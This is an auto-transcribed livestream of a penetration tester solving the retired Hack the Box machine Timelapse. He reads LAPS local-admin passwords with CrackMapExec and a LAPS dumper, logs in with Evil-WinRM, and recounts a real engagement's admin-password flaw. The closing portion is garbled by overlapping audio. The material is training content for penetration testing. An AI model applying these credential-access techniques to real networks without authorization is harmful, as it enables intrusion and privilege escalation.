God, I run into this KDC host every single time now. Medicus Maximus Crack Map Exec is the one that's molding. I don't get it. I get this KDC host crap every single fucking time. Is Hack the Box a staple thing for Sundays? Not always Sundays. We do Hack the Box on other days too. We always hack machines. We do Try Hack Me, Hack the Box, and Proving Grounds most often. Oh, friend, I like things as had a good CME pull request accepted. I honestly want to go into CME and fix it myself. This KDC host thing never fucking works. Like, it just doesn't know. Please add option KDC host. That's what I did. It's right fucking here. Like, and yet it doesn't see it. There's something wrong with the parameters where it doesn't know when you add the KDC host. I think I ran into this last time too, and I downloaded this one right here. We'll try this one. SMB DC01.timelapse.htb. TAC-U. SVC deploy. TAC-P. This is the up-to-date version. The one that I have in Kali is slightly out of date. We ran into this on Scrambled as well. Okay, well, it didn't error out that time, but we didn't get any... we didn't get anything, though. Can you zoom in a little, please? A little bit more, sure. I don't want to make the font super, super big. Yeah, I don't know why it's not working. All right, we'll just move on from that one. Let's just try Lapse Dumper now. Because again, Lapse Dumper is what we would use most likely on a real assessment here. TAC-U, SVC, deploy, TAC-P. That. TAC-D is timelapse.htb. TAC L for LDAP server is the domain controller. And we still don't get anything. What the hell? Did I do it right? Use evil when RM. We already got the password once. Oh, SVC TAC deploy. Thank you. I hope I didn't do that on CrackMap exec as well. Did I do that on CrackMap exec as well? I should probably find out. No, I put the correct username up there. There we go. There's the password. So we got it two different ways. We got it. This is the way I'd more likely do it in real life, because this way is the sneakiest. This is the stealthiest, least detectable way of getting the lapse password. And the other way would be running power view on the host and pulling it with get domain object. So there's the password. So now we can just authenticate with EvilWinRM. You can also do get AD computer DC01. Yeah, that would work too. That would also require power view as well. That was listed up here, I believe. Yeah, there you go. Get AD computer right here. There you go. There's the password. So there's another way you could do it. Cool. Lots of ways to get it. All it is the password is a property on the computer object in Active Directory. But you can only read it if you have the appropriate permissions. Lapse is pretty common these days, so make sure you know how to deal with it on both pen tests and red team assessments. Phrase Flush Minch, thank you so much for the first time Prime indoctrination into the cult. One of the most common vulnerabilities I see in Windows networks is unsecured admin passwords. Local admin accounts that are either being applied in an unsecure way. Probably the most severe vulnerability I've ever found in my entire history. Maybe not that. That's probably too much. But one of the most severe vulnerabilities I've ever found on in my career involved mishandling of the local admin password across the entire domain. Putting it simply, the user, because most of the company was working remotely, they were sending laptops to people, and when you first set up your laptop, it would self-provision itself. And one of the things it was doing was setting the local administrator password, using some proprietary .NET assemblies that were located in a hidden folder in the C drive. After extracting information from those .NET assemblies, even though they were obfuscated, the .NET assemblies were obfuscated, so I couldn't just read how they were setting the admin password. I had to use WinDebug. I had to get credentials to a share from one of the assemblies, and to access one of the other assemblies, which was actually setting the local admin password. And then I had to run WinDebug to execute the assembly, and then put a breakpoint at the entry point of the assembly put a breakpoint on main, essentially. And then from there, I had to check all of the functions until I found one that looked like it was what was actually setting the admin password. And it was accepting a string, and it would output some kind of crazy string that looked like this. It would output some kind of crazy string that would look like this. I couldn't see what the function was named. All I had was a pointer to it. So, but I tried putting in by looking at the strings, I was able to decrypt some of the strings, and one of the strings mentioned the box host name. So I tried putting the host name of my machine in there into that function in WinDebug, and it spit out like some crazy thing like this, and then I tried that against my own machine, and it was the local admin password. So keep in mind that that's not only a privilege escalation vulnerability on my own machine, that's a privesc and RCE on the entire domain. Everything that uses those executables to provision for provisioning is going to have that vulnerability most likely. So that was an extremely severe one that I found one time. Really cool one. And the solution that I recommended to fix it was just to implement Lapse. I recommended them to implement this. So do I have to do like local authentication? Do I have to do like tac local? I feel like I don't have to do that usually. What did I do wrong here? TAC. Oh yeah, TAC-S. I forgot TAC-S. You're absolutely right. There you go. Stream mod with the 8 months. Seen that a lot too? Yeah, it's very, very common to see mishandling of local admin passwords. YLRSec, Int, 9H, Genoversus, Mandarin, Dark Samurai, Akonis, and Clapton is thank you for the follow. Again, the way to fix it, the way to fix it is always Lapse. Lapse is the best way to manage the local admin password that we have right now. Are you kidding me? We're still not done? We're still not done. We're local admin. Is it hidden? Is it a fucking alternate data stream again? If it's an alternate data stream, I'm gonna puke. I regret my life choices because I just did that to the app data folder. Why do I do this? Why do I do these things, chat? Why did you not stop me? Chat, the next time I'm gonna run GCI recurse on a user folder, like dive in the way. No! And stop me. This is ridiculous. You gotta have my back here, chat. This is ridiculous. I regret. Isn't this very noisy? No. All we're doing is listing the contents of directories. God damn it. I fucking hate Evil WinRM sometimes. Very useful tool, but very frustrating. This is what we're here for? Yes, I realize that. You're here to see me suffer. Alright, is it in one of these other ones? I don't want to use GCI recurse. Well, we already been in this one. In this one, there's nothing in this one, so I guess we'll try TRX. Okay, do not run GCI recurse. Oh, it's just here. Okay. Okay, okay. Well, there's the root flag. We found it. Good work, team. We did it. All right, any questions about that box, chat? Any questions about that? It's pretty cool box. That's again, Lapse is pretty common these days. Deeply recommend you're prepared to deal with Lapse. Pretty simple. Lapse just you have to you enroll a computer in Lapse with the domain, and the domain then will randomly generate a long, strong password that it stores in, that it then stores in that particular in the MS, it's the MS admin password or something property in the computer object. Isn't lapse rotated often? Yes. And you can also, people who can manage the lapse password can also edit the can also change the lapse password and force it to be changed. Didn't know about lapse PY until you showed it. Yeah, it's pretty common to use Python-based solutions to interact with stuff like certipy, lapse.py, crackmapexec, all of that through a proxy. That's the best way. Charlie uploaded a video, but not around Amaranth. God, he's so slow on this one. How is this possible? I'm disappointed. Normally, the way I find out about this stuff is through critical. He'll definitely come around to it sooner or later. Can you talk about your interview question? I'm not going to talk about the interview right now, or who it was with. I don't want to risk jeopardizing the position I'm in. So if and when I sign an offer letter, I'll tell you all about it. I mean, I won't tell you the details of how the interview was, but I'll at least tell you some stuff. So, any questions about lapse is rotated often? Yes, automatically. Can you do the perspective machine? Yeah, absolutely. Is that one retired? Is it retired? If it's retired, I absolutely can do it. But I cannot do boxes that are not retired. It's against the TOS. Retired, yes. Yeah, then yeah, we can do it on, how hard is it? Is it a easy, medium, hard? What is it? Easy, medium, hard? Is it a, it's insane level? Oh, shit. Well, as long as there's no, tell you what, if there's no binary exploitation, then yeah, I can do it. That's fine. Do it on Cthulhu Thursday, maybe. If you think it's a really good box. Best advice for an interviewer that gives very open-ended questions with little information? Just do the best you can. Do the best you can, and it's pretty common to get open-ended questions. Like, for example, for red teaming positions, they'll typically ask you scenario-based questions. Like, they're going to assume you know things like, you know, how cross-site scripting works, and that sort of thing. Instead, they're going to be like, okay, so you're on an assessment. This is what the scope is. How do you start? How do you begin? And you just start talking. Just start talking. And don't make anything up. Don't start talking about shit you don't know. Okay? If you don't, like, don't mention that, like, for example, if you're talking about fishing, and they ask you what files you would use, don't be like, I would use an ISO file if you don't really know how people fish with ISO files. If you know Office macros, talk about Office macros. Talk about stuff that you know. And wait for them to ask, and they'll usually interject and ask you various questions to elaborate on various specifics. Yeah, and I usually follow up every question with, is that like the answer you're looking for? Is there anything else I can elaborate on or anything like that? Is that what you're looking for? Perspective is insane, but to be fair, it's not CTF at all. It's just misconfig and research. As long as it's not binary exploitation, I'm open to it. The problem is that most of the binary exploitations are like heap exploitation these days, and I'm not good at heap exploitation. I'm not confident in it. I always reference Amaranth. Like, we can joke about Amaranth, but please be respectful. Please be respectful of her. This is not a good thing. She doesn't deserve what she's going through right now, regardless of what you think of her personality. So please be respectful of her. It's not binary exploitation. Then I'm open to it. I've done non-binary exploitation, insane boxes on stream. If that's what you guys want to see, we'll do it on Cthulhu Thursday. Sounds good to me. All right. Any other questions, chat? Let's look for someone to raid here. It's usually slim pickings on Sunday. Who is this critical guy? He's another Twitch streamer who I've watched for a really long time. He's a Twitch streamer and YouTuber, and he tends to do videos on a lot of stuff, like video games and a lot of stuff. But he often does like drama updates. So he did a video on like Amaranth Stalker, for instance. That was how I learned about it. That's how I learned about most of this drama shit. Like, all of our cyber tech vibes is playing Overwatch 2. I was thinking about playing Overwatch 2 on stream, but I'm so bad at it.
Those tentacles, bro.
Bro, I'm ready for him to say Lucario.
Those tentacles, bro.
Do we want to watch? There's not really anyone streaming
All right, here we go.
that we know. Do we want to do cyber tech vibes?
Gen 4, people. Gen 4, look alive. Infernape. Empoleon.
Oh, is Oa Labs on? If he's on, we'll raid him. Okay, yeah, we'll raid him for sure.
Should actually see if only.
What is he doing?
available.
Uses
I
Python
just-
to
a
get a
little sidetrack
virus through
here.
API. That sounds interesting.
What's a domain? Domain. Look, maybe.
I was thinking about playing Overwatch 2 on
Yeah,
stream, but I'm too
Python
bad
means,
at the fucking game. You guys are just gonna make fun of me the whole time.
Domain.com.
And I'm fine with being made fun of, but also video games tilt me. So, any last questions? We're gonna be doing Newbie Tuesday on Tuesday. Next stream will be on Tuesday. It'll be Newbie Tuesday per usual.
We'll just go down. What's the Namecheap is the one.
I gotta get that new. I finally gotta get that new YouTube video out this week. You'll have more information about any possible on that job interview. Hopefully this week, if you care. I only mention it because I'm excited about it. I'm thinking about it a lot. So hopefully there'll be good news in that regard this week.
Onlycheats.ai.
Make the gaming stream a drinking game. That would be fun. We might be able to do that. When? Tuesday or Sunday? It'll be Newbie Tuesday. The next stream will be Tuesday. It'll be Newbie Tuesday. Then it'll be I stream on Tuesday, Thursday, and Sunday. All right, we're running Oa Labs Live, a friend of the stream. He's doing some API hacking, it looks like, with Python. And yeah, go to bed tonight, knowing a little bit more than you did yesterday. See you guys again when the stars are right.
I'm not sure what
stay safe. Love all of you.